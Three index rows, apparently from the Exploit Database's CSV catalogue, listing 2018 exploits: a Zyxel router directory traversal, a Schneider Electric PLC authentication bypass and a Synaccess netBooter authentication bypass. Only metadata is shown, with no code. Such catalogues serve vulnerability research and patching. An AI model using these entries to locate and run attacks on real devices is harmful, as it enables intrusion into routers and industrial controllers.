45904,exploits/hardware/webapps/45904.txt,"Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal",2018-11-26,"numan türle",webapps,hardware,80 +45918,exploits/hardware/webapps/45918.py,"Schneider Electric PLC - Session Calculation Authentication Bypass",2018-11-30,Photubias,webapps,hardware,80 +45920,exploits/cgi/webapps/45920.txt,"Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass",2018-11-30,LiquidWorm,webapps,cgi,80